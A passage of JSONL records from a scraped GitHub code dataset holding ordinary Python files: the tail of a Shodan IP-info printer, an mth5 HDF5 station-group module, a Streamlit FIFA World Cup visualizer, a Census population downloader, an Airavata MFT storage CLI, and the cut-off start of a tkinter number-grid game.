\"city :\",\" \"*11,ipinfo[\"city\"], \"\\n\",\n \"country :\",\" \"*8,ipinfo[\"country_name\"],\"\\n\",\n \"organization :\",\" \"*3,ipinfo[\"org\"], \"\\n\",\n \"port :\",\" \"*11,ipinfo['data'][0]['port'],\"\\n\"\n )\n if x ==1:\n print(a.tools.myip())\n if x == 0:\n break\n","repo_name":"sashreek1/shodan_scan","sub_path":"shodan_scanner.py","file_name":"shodan_scanner.py","file_ext":"py","file_size_in_byte":1120,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11713988302","text":"import inspect\n\nimport h5py\nimport numpy as np\nimport pandas as pd\n\nfrom mt_metadata import timeseries as metadata\nfrom mt_metadata.utils.mttime import MTime\n\nfrom mth5.groups import (\n BaseGroup,\n RunGroup,\n TransferFunctionsGroup,\n MasterFCGroup,\n)\nfrom mth5.helpers import from_numpy_type\nfrom mth5.utils.exceptions import MTH5Error\n\nmeta_classes = dict(inspect.getmembers(metadata, inspect.isclass))\n# =============================================================================\n# Standards Group\n# =============================================================================\n\n\nclass MasterStationGroup(BaseGroup):\n \"\"\"\n Utility class to holds information about the stations within a survey and\n accompanying metadata. This class is next level down from Survey for\n stations ``/Survey/Stations``. This class provides methods to add and\n get stations. A summary table of all existing stations is also provided\n as a convenience look up table to make searching easier.\n\n To access MasterStationGroup from an open MTH5 file:\n\n >>> from mth5 import mth5\n >>> mth5_obj = mth5.MTH5()\n >>> mth5_obj.open_mth5(r\"/test.mth5\", mode='a')\n >>> stations = mth5_obj.stations_group\n\n To check what stations exist\n\n >>> stations.groups_list\n ['summary', 'MT001', 'MT002', 'MT003']\n\n To access the hdf5 group directly use `SurveyGroup.hdf5_group`.\n\n >>> stations.hdf5_group.ref\n \n\n .. note:: All attributes should be input into the metadata object, that\n way all input will be validated against the metadata standards.\n If you change attributes in metadata object, you should run the\n `SurveyGroup.write_metadata()` method. This is a temporary\n solution, working on an automatic updater if metadata is changed.\n\n >>> stations.metadata.existing_attribute = 'update_existing_attribute'\n >>> stations.write_metadata()\n\n If you want to add a new attribute this should be done using the\n `metadata.add_base_attribute` method.\n\n >>> stations.metadata.add_base_attribute('new_attribute',\n >>> ... 'new_attribute_value',\n >>> ... {'type':str,\n >>> ... 'required':True,\n >>> ... 'style':'free form',\n >>> ... 'description': 'new attribute desc.',\n >>> ... 'units':None,\n >>> ... 'options':[],\n >>> ... 'alias':[],\n >>> ... 'example':'new attribute\n\n To add a station:\n\n >>> new_station = stations.add_station('new_station')\n >>> stations\n /Survey/Stations:\n ====================\n --> Dataset: summary\n ......................\n |- Group: new_station\n ---------------------\n --> Dataset: summary\n ......................\n\n Add a station with metadata:\n\n >>> from mth5.metadata import Station\n >>> station_metadata = Station()\n >>> station_metadata.id = 'MT004'\n >>> station_metadata.time_period.start = '2020-01-01T12:30:00'\n >>> station_metadata.location.latitude = 40.000\n >>> station_metadata.location.longitude = -120.000\n >>> new_station = stations.add_station('Test_01', station_metadata)\n >>> # to look at the metadata\n >>> new_station.metadata\n {\n \"station\": {\n \"acquired_by.author\": null,\n \"acquired_by.comments\": null,\n \"id\": \"MT004\",\n ...\n }\n }\n\n\n .. seealso:: `mth5.metadata` for details on how to add metadata from\n various files and python objects.\n\n To remove a station:\n\n >>> stations.remove_station('new_station')\n >>> stations\n /Survey/Stations:\n ====================\n --> Dataset: summary\n ......................\n\n .. note:: Deleting a station is not as simple as del(station). In HDF5\n this does not free up memory, it simply removes the reference\n to that station. The common way to get around this is to\n copy what you want into a new file, or overwrite the station.\n\n To get a station:\n\n >>> existing_station = stations.get_station('existing_station_name')\n >>> existing_station\n /Survey/Stations/existing_station_name:\n =======================================\n --> Dataset: summary\n ......................\n |- Group: run_01\n ----------------\n --> Dataset: summary\n ......................\n --> Dataset: Ex\n ......................\n --> Dataset: Ey\n ......................\n --> Dataset: Hx\n ......................\n --> Dataset: Hy\n ......................\n --> Dataset: Hz\n ......................\n\n A summary table is provided to make searching easier. The table\n summarized all stations within a survey. To see what names are in the\n summary table:\n\n >>> stations.station_summary\n\n \"\"\"\n\n def __init__(self, group, **kwargs):\n\n super().__init__(group, **kwargs)\n\n @property\n def station_summary(self):\n \"\"\"\n Summary of stations in the file\n\n :return: DESCRIPTION\n :rtype: TYPE\n\n \"\"\"\n st_list = []\n for key, group in self.hdf5_group.items():\n entry = {\n \"station\": key,\n \"start\": group.attrs[\"time_period.start\"],\n \"end\": group.attrs[\"time_period.end\"],\n \"latitude\": group.attrs[\"location.latitude\"],\n \"longitude\": group.attrs[\"location.longitude\"],\n }\n st_list.append(entry)\n\n df = pd.DataFrame(st_list)\n df.start = pd.to_datetime(df.start)\n df.end = pd.to_datetime(df.end)\n\n return df\n\n def add_station(self, station_name, station_metadata=None):\n \"\"\"\n Add a station with metadata if given with the path:\n ``/Survey/Stations/station_name``\n\n If the station already exists, will return that station and nothing\n is added.\n\n :param station_name: Name of the station, should be the same as\n metadata.id\n :type station_name: string\n :param station_metadata: Station metadata container, defaults to None\n :type station_metadata: :class:`mth5.metadata.Station`, optional\n :return: A convenience class for the added station\n :rtype: :class:`mth5_groups.StationGroup`\n\n :Example: ::\n\n >>> from mth5 import mth5\n >>> mth5_obj = mth5.MTH5()\n >>> mth5_obj.open_mth5(r\"/test.mth5\", mode='a')\n >>> # one option\n >>> stations = mth5_obj.stations_group\n >>> new_station = stations.add_station('MT001')\n >>> # another option\n >>> new_staiton = mth5_obj.stations_group.add_station('MT001')\n\n .. todo:: allow dictionaries, json string, xml elements as metadata\n input.\n\n \"\"\"\n if station_name is None:\n raise Exception(\n \"station name is None, do not know what to name it\"\n )\n\n return self._add_group(\n station_name, StationGroup, station_metadata, match=\"id\"\n )\n\n def get_station(self, station_name):\n \"\"\"\n Get a station with the same name as station_name\n\n :param station_name: existing station name\n :type station_name: string\n :return: convenience station class\n :rtype: :class:`mth5.mth5_groups.StationGroup`\n :raises MTH5Error: if the station name is not found.\n\n :Example:\n\n >>> from mth5 import mth5\n >>> mth5_obj = mth5.MTH5()\n >>> mth5_obj.open_mth5(r\"/test.mth5\", mode='a')\n >>> # one option\n >>> stations = mth5_obj.stations_group\n >>> existing_station = stations.get_station('MT001')\n >>> # another option\n >>> existing_staiton = mth5_obj.stations_group.get_station('MT001')\n MTH5Error: MT001 does not exist, check station_list for existing names\n\n \"\"\"\n return self._get_group(station_name, StationGroup)\n\n def remove_station(self, station_name):\n \"\"\"\n Remove a station from the file.\n\n .. note:: Deleting a station is not as simple as del(station). In HDF5\n this does not free up memory, it simply removes the reference\n to that station. The common way to get around this is to\n copy what you want into a new file, or overwrite the station.\n\n :param station_name: existing station name\n :type station_name: string\n\n :Example: ::\n\n >>> from mth5 import mth5\n >>> mth5_obj = mth5.MTH5()\n >>> mth5_obj.open_mth5(r\"/test.mth5\", mode='a')\n >>> # one option\n >>> stations = mth5_obj.stations_group\n >>> stations.remove_station('MT001')\n >>> # another option\n >>> mth5_obj.stations_group.remove_station('MT001')\n\n \"\"\"\n\n self._remove_group(station_name)\n\n\n# =============================================================================\n# Station Group\n# =============================================================================\nclass StationGroup(BaseGroup):\n \"\"\"\n StationGroup is a utility class to hold information about a single station\n and accompanying metadata. This class is the next level down from\n Stations --> ``/Survey/Stations/station_name``.\n\n This class provides methods to add and get runs. A summary table of all\n existing runs in the station is also provided as a convenience look up\n table to make searching easier.\n\n :param group: HDF5 group for a station, should have a path\n ``/Survey/Stations/station_name``\n :type group: :class:`h5py.Group`\n :param station_metadata: metadata container, defaults to None\n :type station_metadata: :class:`mth5.metadata.Station`, optional\n\n :Usage:\n\n :Access StationGroup from an open MTH5 file:\n\n >>> from mth5 import mth5\n >>> mth5_obj = mth5.MTH5()\n >>> mth5_obj.open_mth5(r\"/test.mth5\", mode='a')\n >>> station = mth5_obj.stations_group.get_station('MT001')\n\n :Check what runs exist:\n\n >>> station.groups_list\n ['MT001a', 'MT001b', 'MT001c', 'MT001d']\n\n To access the hdf5 group directly use `StationGroup.hdf5_group`.\n\n >>> station.hdf5_group.ref\n \n\n .. note:: All attributes should be input into the metadata object, that\n way all input will be validated against the metadata standards.\n If you change attributes in metadata object, you should run the\n `SurveyGroup.write_metadata()` method. This is a temporary\n solution, working on an automatic updater if metadata is changed.\n\n >>> station.metadata.existing_attribute = 'update_existing_attribute'\n >>> station.write_metadata()\n\n If you want to add a new attribute this should be done using the\n `metadata.add_base_attribute` method.\n\n >>> station.metadata.add_base_attribute('new_attribute',\n >>> ... 'new_attribute_value',\n >>> ... {'type':str,\n >>> ... 'required':True,\n >>> ... 'style':'free form',\n >>> ... 'description': 'new attribute desc.',\n >>> ... 'units':None,\n >>> ... 'options':[],\n >>> ... 'alias':[],\n >>> ... 'example':'new attribute\n\n :To add a run:\n\n >>> new_run = stations.add_run('MT001e')\n >>> new_run\n /Survey/Stations/Test_01:\n =========================\n |- Group: MT001e\n -----------------\n --> Dataset: summary\n ......................\n --> Dataset: summary\n ......................\n\n :Add a run with metadata:\n\n >>> from mth5.metadata import Run\n >>> run_metadata = Run()\n >>> run_metadata.time_period.start = '2020-01-01T12:30:00'\n >>> run_metadata.time_period.end = '2020-01-03T16:30:00'\n >>> run_metadata.location.latitude = 40.000\n >>> run_metadata.location.longitude = -120.000\n >>> new_run = runs.add_run('Test_01', run_metadata)\n >>> # to look at the metadata\n >>> new_run.metadata\n {\n \"run\": {\n \"acquired_by.author\": \"new_user\",\n \"acquired_by.comments\": \"First time\",\n \"channels_recorded_auxiliary\": ['T'],\n ...\n }\n }\n\n\n .. seealso:: `mth5.metadata` for details on how to add metadata from\n various files and python objects.\n\n :Remove a run:\n\n >>> station.remove_run('new_run')\n >>> station\n /Survey/Stations/Test_01:\n =========================\n --> Dataset: summary\n ......................\n\n .. note:: Deleting a station is not as simple as del(station). In HDF5\n this does not free up memory, it simply removes the reference\n to that station. The common way to get around this is to\n copy what you want into a new file, or overwrite the station.\n\n :Get a run:\n\n >>> existing_run = stations.get_station('existing_run')\n >>> existing_run\n /Survey/Stations/MT001/MT001a:\n =======================================\n --> Dataset: summary\n ......................\n --> Dataset: Ex\n ......................\n --> Dataset: Ey\n ......................\n --> Dataset: Hx\n ......................\n --> Dataset: Hy\n ......................\n --> Dataset: Hz\n ......................\n\n :summary Table:\n\n A summary table is provided to make searching easier. The table\n summarized all stations within a survey. To see what names are in the\n summary table:\n\n >>> new_run.summary_table.dtype.descr\n [('id', ('|S20', {'h5py_encoding': 'ascii'})),\n ('start', ('|S32', {'h5py_encoding': 'ascii'})),\n ('end', ('|S32', {'h5py_encoding': 'ascii'})),\n ('components', ('|S100', {'h5py_encoding': 'ascii'})),\n ('measurement_type', ('|S12', {'h5py_encoding': 'ascii'})),\n ('sample_rate', '>> station.summary_table\n index | id | start | end | components | measurement_type | sample_rate |\n hdf5_reference\n --------------------------------------------------------------------------\n -------------\n \"\"\"\n\n def __init__(self, group, station_metadata=None, **kwargs):\n self._default_subgroup_names = [\n \"Transfer_Functions\",\n \"Fourier_Coefficients\",\n ]\n super().__init__(group, group_metadata=station_metadata, **kwargs)\n\n def initialize_group(self, **kwargs):\n \"\"\"\n Initialize group by making a summary table and writing metadata\n\n \"\"\"\n for key, value in kwargs.items():\n setattr(self, key, value)\n self.write_metadata()\n\n for group_name in self._default_subgroup_names:\n self.hdf5_group.create_group(f\"{group_name}\")\n m5_grp = getattr(self, f\"{group_name.lower()}_group\")\n m5_grp.initialize_group()\n\n @property\n def master_station_group(self):\n \"\"\"shortcut to master station group\"\"\"\n return MasterStationGroup(self.hdf5_group.parent)\n\n @property\n def transfer_functions_group(self):\n \"\"\"Convinience method for /Station/Transfer_Functions\"\"\"\n return TransferFunctionsGroup(\n self.hdf5_group[\"Transfer_Functions\"], **self.dataset_options\n )\n\n @property\n def fourier_coefficients_group(self):\n \"\"\"Convinience method for /Station/Fourier_Coefficients\"\"\"\n return MasterFCGroup(\n self.hdf5_group[\"Fourier_Coefficients\"], **self.dataset_options\n )\n\n @property\n def survey_metadata(self):\n \"\"\"survey metadata\"\"\"\n\n meta_dict = dict(self.hdf5_group.parent.parent.attrs)\n for key, value in meta_dict.items():\n meta_dict[key] = from_numpy_type(value)\n survey_metadata = metadata.Survey()\n survey_metadata.from_dict({\"survey\": meta_dict})\n survey_metadata.add_station(self.metadata)\n return survey_metadata\n\n @BaseGroup.metadata.getter\n def metadata(self):\n \"\"\"Overwrite get metadata to include run information in the station\"\"\"\n\n if not self._has_read_metadata:\n self.read_metadata()\n self._has_read_metadata = True\n\n for key in self.groups_list:\n if key.lower() in [\n name.lower() for name in self._default_subgroup_names\n ]:\n continue\n try:\n key_group = self.get_run(key)\n self._metadata.add_run(key_group.metadata)\n except MTH5Error:\n self.logger.warning(f\"Could not find run {key}\")\n return self._metadata\n\n @property\n def name(self):\n return self.metadata.id\n\n @name.setter\n def name(self, name):\n self.metadata.id = name\n\n @property\n def run_summary(self):\n \"\"\"\n Summary of runs in the station\n\n :return: DESCRIPTION\n :rtype: TYPE\n\n \"\"\"\n\n run_list = []\n for key, group in self.hdf5_group.items():\n if group.attrs[\"mth5_type\"].lower() in [\"run\"]:\n comps = \",\".join(\n [\n ii.decode()\n for ii in group.attrs[\n \"channels_recorded_auxiliary\"\n ].tolist()\n + group.attrs[\"channels_recorded_electric\"].tolist()\n + group.attrs[\"channels_recorded_magnetic\"].tolist()\n ]\n )\n run_list.append(\n (\n group.attrs[\"id\"],\n group.attrs[\"time_period.start\"].split(\"+\")[0],\n group.attrs[\"time_period.end\"].split(\"+\")[0],\n comps,\n group.attrs[\"data_type\"],\n group.attrs[\"sample_rate\"],\n group.ref,\n )\n )\n run_summary = np.array(\n run_list,\n dtype=np.dtype(\n [\n (\"id\", \"U20\"),\n (\"start\", \"datetime64[ns]\"),\n (\"end\", \"datetime64[ns]\"),\n (\"components\", \"U100\"),\n (\"measurement_type\", \"U12\"),\n (\"sample_rate\", float),\n (\"hdf5_reference\", h5py.ref_dtype),\n ]\n ),\n )\n\n return pd.DataFrame(run_summary)\n\n def make_run_name(self, alphabet=False):\n \"\"\"\n Make a run name that will be the next alphabet letter extracted from\n the run list. Expects that all runs are labled as id{a-z}.\n\n :return: metadata.id + next letter\n :rtype: string\n\n >>> station.metadata.id = 'MT001'\n >>> station.make_run_name()\n 'MT001a'\n\n \"\"\"\n\n run_list = sorted(\n [group[-1:] for group in self.groups_list if self.name in group]\n )\n\n next_letter = None\n if len(run_list) == 0:\n if alphabet:\n next_letter = \"a\"\n else:\n next_letter = \"001\"\n else:\n try:\n next_letter = chr(ord(run_list[-1]) + 1)\n except TypeError:\n try:\n next_letter = f\"{int(run_list[-1]) + 1}\"\n except ValueError:\n self.logger.info(\"Could not create a new run name\")\n return next_letter\n\n def locate_run(self, sample_rate, start):\n \"\"\"\n Locate a run based on sample rate and start time from the summary table\n\n :param sample_rate: sample rate in samples/seconds\n :type sample_rate: float\n :param start: start time\n :type start: string or :class:`mth5.utils.mttime.MTime`\n :return: appropriate run name, None if not found\n :rtype: string or None\n\n \"\"\"\n\n if not isinstance(start, MTime):\n start = MTime(start)\n\n run_summary = self.run_summary.copy()\n if run_summary.size < 1:\n return None\n sr_find = run_summary[\n (run_summary.sample_rate == sample_rate)\n & (run_summary.start == start)\n ]\n if sr_find.size < 1:\n return None\n return sr_find\n\n def add_run(self, run_name, run_metadata=None):\n \"\"\"\n Add a run to a station.\n\n :param run_name: run name, should be id{a-z}\n :type run_name: string\n :param metadata: metadata container, defaults to None\n :type metadata: :class:`mth5.metadata.Station`, optional\n\n need to be able to fill an entry in the summary table.\n\n .. todo:: auto fill run name if none is given.\n\n .. todo:: add ability to add a run with data.\n\n \"\"\"\n\n return self._add_group(\n run_name, RunGroup, group_metadata=run_metadata, match=\"id\"\n )\n\n def get_run(self, run_name):\n \"\"\"\n get a run from run name\n\n :param run_name: existing run name\n :type run_name: string\n :return: Run object\n :rtype: :class:`mth5.mth5_groups.RunGroup`\n\n >>> existing_run = station.get_run('MT001')\n\n \"\"\"\n\n return self._get_group(run_name, RunGroup)\n\n def remove_run(self, run_name):\n \"\"\"\n Remove a run from the station.\n\n .. note:: Deleting a station is not as simple as del(station). In HDF5\n this does not free up memory, it simply removes the reference\n to that station. The common way to get around this is to\n copy what you want into a new file, or overwrite the station.\n\n :param station_name: existing station name\n :type station_name: string\n\n :Example: ::\n\n >>> from mth5 import mth5\n >>> mth5_obj = mth5.MTH5()\n >>> mth5_obj.open_mth5(r\"/test.mth5\", mode='a')\n >>> # one option\n >>> stations = mth5_obj.stations_group\n >>> stations.remove_station('MT001')\n >>> # another option\n >>> mth5_obj.stations_group.remove_station('MT001')\n\n \"\"\"\n\n self._remove_group(run_name)\n\n def update_station_metadata(self):\n \"\"\"\n Check metadata from the runs and make sure it matches the station metadata\n\n :return: DESCRIPTION\n :rtype: TYPE\n\n \"\"\"\n\n run_summary = self.run_summary.copy()\n self._metadata.time_period.start = run_summary.start.min().isoformat()\n self._metadata.time_period.end = run_summary.end.max().isoformat()\n self._metadata.channels_recorded = list(\n set(\",\".join(run_summary.components.to_list()).split(\",\"))\n )\n\n self.write_metadata()\n","repo_name":"kujaku11/mth5","sub_path":"mth5/groups/station.py","file_name":"station.py","file_ext":"py","file_size_in_byte":23622,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"53"} +{"seq_id":"19724940069","text":"import streamlit as st\r\nimport pandas as pd\r\nimport altair as alt\r\n\r\n# Load the data from a CSV file\r\ndata = pd.read_csv('fifa_world_cup_data.csv')\r\n\r\n# Create a table with the desired columns\r\ntable = data[['Year', 'Winner', 'Host', 'Highest Goal Scorer']]\r\n\r\n# Set the table headers\r\ntable.columns = ['Year', 'Winner', 'Host', 'Highest Goal Scorer']\r\n\r\n# Home Page\r\nst.set_page_config(page_title='FIFA World Cup Visualizer', page_icon=':soccer:', layout='wide')\r\nst.title('FIFA World Cup Visualizer')\r\nst.write('Welcome to the FIFA World Cup Visualizer! This app provides an interactive way to explore World Cup data. Use the sidebar to select different visualizations.')\r\nst.write('🌎🏆🥇🥅')\r\n\r\n# Sidebar\r\nst.sidebar.title('Visualizations')\r\noptions = ['World Cup Winners', 'Wins by Country', 'Highest Goal Scorer by Year']\r\nchoice = st.sidebar.selectbox('Select a visualization', options)\r\n\r\n\r\n# Display the selected visualization\r\nif choice == 'World Cup Winners':\r\n st.header('🏆 FIFA World Cup Winners 🏆')\r\n st.write('This table shows the winners of the FIFA World Cup, along with the host country, highest goal scorer, and the year in which the tournament was held.')\r\n st.table(table)\r\nelif choice == 'Wins by Country':\r\n # Create a bar chart showing the number of times each country has won the World Cup\r\n winners = data['Winner'].value_counts().rename_axis('country').reset_index(name='num_wins')\r\n chart1 = alt.Chart(winners).mark_bar().encode(\r\n x='country:N',\r\n y='num_wins:Q'\r\n )\r\n chart1.properties(title='Number of World Cup wins by country')\r\n st.header('🏆 Number of World Cup wins by country 🌎')\r\n st.write('This bar chart shows the number of times each country has won the FIFA World Cup.')\r\n st.altair_chart(chart1, use_container_width=True)\r\nelif choice == 'Wins by Host':\r\n # Create a pie chart showing the number of times each country has hosted the World Cup\r\n hosts = data['Host'].value_counts().rename_axis('host').reset_index(name='num_hosts')\r\n chart2 = alt.Chart(hosts).mark_arc().encode(\r\n theta='num_hosts:Q',\r\n color=alt.Color('host:N', legend=None),\r\n tooltip=['host', 'num_hosts']\r\n ).properties(\r\n width=400,\r\n height=400,\r\n title='Number of World Cup hosts by country'\r\n )\r\n chart2.title = 'Number of World Cup hosts by country'\r\n st.header('🌎 Number of World Cup hosts by country 🏆')\r\n st.write('This pie chart shows the number of times each country has hosted the FIFA World Cup.')\r\n st.altair_chart(chart2, use_container_width=True)\r\nelif choice == 'Highest Goal Scorer by Year':\r\n # Create a 3D scatter chart showing the relationship between highest goal scorer and year\r\n scatter_data = data[['Year', 'Highest Goal Scorer']]\r\n scatter_data.columns = ['Year', 'Highest Goal Scorer']\r\n chart3 = alt.Chart(scatter_data).mark_circle().encode(\r\n x='Year:N',\r\n y='Highest Goal Scorer:N',\r\n size=alt.Size('count():Q', legend=None),\r\n color=alt.Color('Year:N', legend=None),\r\n tooltip=['Year', 'Highest Goal Scorer', 'count()']\r\n ).properties(\r\n width=600,\r\n height=400,\r\n title='Highest goal scorer by year'\r\n )\r\n chart3.title = 'Highest Goal Scorer by Year'\r\n st.header('🥅 Highest goal scorer by year 📅')\r\n st.write('This 3D scatter chart shows the relationship between the highest goal scorer and the year in which the tournament was held.')\r\n st.altair_chart(chart3, use_container_width=True)\r\n","repo_name":"cloudtechhills/world_cup_visualiser","sub_path":"football-visualiser.py","file_name":"football-visualiser.py","file_ext":"py","file_size_in_byte":3567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21187934271","text":"import requests\nimport pandas as pd\nimport json\n\n# input start and end years to get the data from API\nstart_year = 2015\nend_year = 2019\n\n# define path for output file of population data\noutput_path = 'data/cleaned/data_pop_' + str(start_year) + '_' + str(end_year) + '.csv'\n\n# define path to get the mapping CSV files\nmapping_agegroup_path = 'data/cleaned/mapping/mapping_pop_agegroup.csv'\nmapping_race_path = 'data/cleaned/mapping/mapping_pop_race.csv'\nmapping_state_path = 'data/cleaned/mapping/mapping_pop_state.csv'\n\n\ndef get_data(start_year, end_year):\n df_output = pd.DataFrame(columns=['pop', 'agegroup_code', 'race_code', 'sex_code', 'state_code', 'year'])\n for year in range(start_year, end_year + 1):\n # GET request\n url = 'https://api.census.gov/data/' + str(year) + '/pep/charagegroups?get=POP,AGEGROUP,RACE,SEX&for=state:*'\n res = requests.get(url)\n\n # read response to pandas dataframe\n df = pd.DataFrame(json.loads(res.text)[1:], columns=['pop', 'agegroup_code', 'race_code', 'sex_code', 'state_code'])\n df = df.astype(float).round().astype(int) # change datatype to int, found some anomalies where num population is float\n df['year'] = year # add year column\n\n df_output = df_output.append(df, ignore_index=True)\n\n return df_output\n\n\ndef filter_data(df_output):\n df_filtered = df_output[(df_output.agegroup_code >= 1) & (df_output.agegroup_code <= 18) & \\\n (df_output.race_code >= 1) & (df_output.race_code <= 6) & \\\n (df_output.sex_code != 0)]\n return df_filtered\n\n\ndef map_data(df_filtered):\n df_mapping_agegroup = pd.read_csv(mapping_agegroup_path)\n df_mapping_race = pd.read_csv(mapping_race_path)\n df_mapping_state = pd.read_csv(mapping_state_path)\n\n df_mapped = df_filtered.merge(df_mapping_agegroup, how='left', left_on='agegroup_code', right_on='age_group_code')\n df_mapped = df_mapped.merge(df_mapping_race, how='left', on='race_code')\n df_mapped = df_mapped.merge(df_mapping_state, how='left', on='state_code')\n df_mapped['sex'] = df_mapped['sex_code'].map({1:'M', 2:'F'})\n\n df_mapped = df_mapped[['year', 'agegroup_code', 'min_age', 'max_age', 'average_age', 'race_code',\\\n 'race', 'state_code', 'state', 'postal_abbr', 'sex_code', 'sex', 'pop']]\n\n return df_mapped\n\n\ndef write_to_csv(df, path):\n df.to_csv(path, index=False)\n\n\nif __name__ == '__main__':\n # get population data for the specified years from API and output as pandas df\n df_output = get_data(start_year, end_year)\n # filter data so that it doesn't contain any duplicates > age group, race, sex\n df_filtered = filter_data(df_output)\n # map columns (age group, race, state) with the mapping read from CSV\n df_mapped = map_data(df_filtered)\n # write output files\n write_to_csv(df_mapped, output_path)\n\n\n\n\n","repo_name":"bvorapoom/usc_apds","sub_path":"551_Data Management/Project/downloadPopData.py","file_name":"downloadPopData.py","file_ext":"py","file_size_in_byte":2899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10469621161","text":"import typer\nfrom pick import pick\nimport airavata_mft_cli.storage.s3 as s3\nimport airavata_mft_cli.storage.scp as scp\nimport airavata_mft_cli.storage.azure as azure\nimport airavata_mft_cli.storage.gcs as gcs\nimport airavata_mft_cli.storage.local as local\nimport airavata_mft_cli.storage.swift as swift\nimport airavata_mft_cli.storage.http as http\nfrom airavata_mft_sdk import mft_client\nfrom airavata_mft_sdk.common import StorageCommon_pb2\nfrom rich.console import Console\nfrom rich.table import Table\nfrom rich import print\nimport sys\nsys.path.append('../airavata_mft_cli')\nfrom airavata_mft_cli import config as configcli\nfrom airavata_mft_cli.util import exception_handler\n\napp = typer.Typer(pretty_exceptions_show_locals=True)\n\n@app.command(\"add\")\ndef add_storage():\n try:\n title = \"Select storage type: \"\n options = [\"S3\", \"Google Cloud Storage (GCS)\", \"Azure Storage\", \"Openstack SWIFT\", \"SCP\", \"FTP\", \"Box\", \"DropBox\", \"OData\", \"Agent\", \"HTTP\" ]\n option, index = pick(options, title, indicator=\"=>\")\n if option == \"S3\":\n s3.handle_add_storage()\n elif option == \"Azure Storage\":\n azure.handle_add_storage()\n elif option == \"Google Cloud Storage (GCS)\":\n gcs.handle_add_storage()\n elif option == \"Agent\":\n local.handle_add_storage()\n elif option == \"Openstack SWIFT\":\n swift.handle_add_storage()\n elif option == \"SCP\":\n scp.handle_add_storage()\n elif option == \"HTTP\":\n http.handle_add_storage()\n except Exception as e:\n exception_handler(e)\n\n@app.command(\"remove\")\ndef remove_storage(storage_id):\n client = mft_client.MFTClient(transfer_api_port = configcli.transfer_api_port,\n transfer_api_secured = configcli.transfer_api_secured,\n resource_service_host = configcli.resource_service_host,\n resource_service_port = configcli.resource_service_port,\n resource_service_secured = configcli.resource_service_secured,\n secret_service_host = configcli.secret_service_host,\n secret_service_port = configcli.secret_service_port)\n delete_request = StorageCommon_pb2.SecretForStorageDeleteRequest(storageId=storage_id)\n delete_response = client.common_api.deleteSecretsForStorage(delete_request)\n console = Console()\n console.print(\"Storage removed: \" + str(delete_response.status))\n\n@app.command(\"list\")\ndef list_storage():\n try:\n client = mft_client.MFTClient(transfer_api_port = configcli.transfer_api_port,\n transfer_api_secured = configcli.transfer_api_secured,\n resource_service_host = configcli.resource_service_host,\n resource_service_port = configcli.resource_service_port,\n resource_service_secured = configcli.resource_service_secured,\n secret_service_host = configcli.secret_service_host,\n secret_service_port = configcli.secret_service_port)\n list_req = StorageCommon_pb2.StorageListRequest()\n list_response = client.common_api.listStorages(list_req)\n\n console = Console()\n table = Table(show_header=True, header_style='bold #2070b2')\n\n table.add_column('Storage Name', justify='left')\n table.add_column('Type', justify='center')\n table.add_column('Storage ID', justify='center')\n\n for storage in list_response.storageList:\n\n table.add_row('[bold]' + storage.storageName + '[/bold]',\n StorageCommon_pb2.StorageType.Name(storage.storageType),\n storage.storageId)\n\n console.print(table)\n except Exception as e:\n exception_handler(e)","repo_name":"apache/airavata-mft","sub_path":"python-cli/mft_cli/airavata_mft_cli/storage/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4000,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"53"} +{"seq_id":"9129234552","text":"\r\nfrom tkinter import *\r\nimport tkinter as tk\r\nimport random\r\nimport numpy as np\r\n\r\n\r\n# Colours of each button on the basis of number on it\r\nBACKGROUND_COLOR_CELLS = {1: \"#f5f5f5\", 2: \"#e0f2f8\", 3: \"#b8dbe5\",\r\n 4: \"#71b1bd\", 5: \"#27819f\", 6: \"#0073b9\",\r\n 7: \"#7fa8d7\", 8: \"#615ea6\", 9: \"#2f3490\",\r\n 10: \"#1c1691\"}\r\n\r\n\r\nclass Grid_num(Frame):\r\n\r\n def __init__(self):\r\n Frame.__init__(self)\r\n self.grid()\r\n self.master.title('Check Number')\r\n self.l = list(range(1,11))\r\n \r\n self.grid_cells = []\r\n self.background = Frame(self, bg=\"#72549d\",width=600, height=400,padx=400,pady=200)\r\n self.rootframe = tk.Frame(self,width=200, height=200,padx=200,pady=200)\r\n\r\n self.buttonframe = tk.Frame(self)\r\n self.buttonframe.grid(row=1, column=0, columnspan=1)\r\n self.background.grid()\r\n self.start()\r\n self.rnum=0\r\n self.list_comb=[]\r\n self.sub=[]\r\n self.gindex=[]\r\n self.allinone=[]\r\n\r\n def tileselect(self,event):\r\n \"\"\"Selection of tiles on the basis of random number\"\"\"\r\n x=event.widget._coords[0]\r\n y=event.widget._coords[1]\r\n \r\n #checking for the element exist in the list\r\n if self.matrix[x][y] not in self.list_comb: \r\n if self.matrix[x][y]==self.rnum:\r\n self.list_comb.append(self.matrix[x][y])\r\n self.matrix[x][y]=0\r\n self.grid_cells[x][y].configure(text=\" \", bg=\"red\")\r\n self.score+=1\r\n self.scorel.config(text = \"NUMBER: \"+str(self.score))\r\n\r\n else:\r\n \r\n #chacking for the last element in the list and pairing them sum \r\n self.sub.append(self.matrix[x][y])\r\n self.gindex.append([x,y])\r\n len_sub=len(self.sub)\r\n len_ind=len(self.gindex)\r\n\r\n if len_sub==1:\r\n print(\" \")\r\n \r\n elif (self.sub[len_sub-1]+self.sub[len_sub-2])==self.rnum:\r\n self.list_comb.append(self.sub[len_sub-1])\r\n self.list_comb.append(self.sub[len_sub-2])\r\n self.score+=2\r\n self.scorel.config(text = \"NUMBER: \"+str(self.score))\r\n\r\n x1=self.gindex[len(self.gindex)-1][0]\r\n y1=self.gindex[len(self.gindex)-1][1]\r\n x2=self.gindex[len(self.gindex)-2][0]\r\n y2=self.gindex[len(self.gindex)-2][1]\r\n self.matrix[x1][y1]=0\r\n self.matrix[x2][y2]=0\r\n self.grid_cells[x1][y1].configure(text=\" \", bg=\"red\")\r\n self.grid_cells[x2][y2].configure(text=\" \", bg=\"red\")\r\n \r\n \r\n else:\r\n print(\"\")\r\n self.allinone.append(self.list_comb) \r\n \r\n def init_grid(self):\r\n self.grid_cells = []\r\n self.background = Frame(self, bg=\"#72549d\",width=500, height=500,padx=30,pady=30)\r\n self.background.grid()\r\n \r\n for i in range(6):\r\n grid_row = []\r\n for j in range(10):\r\n 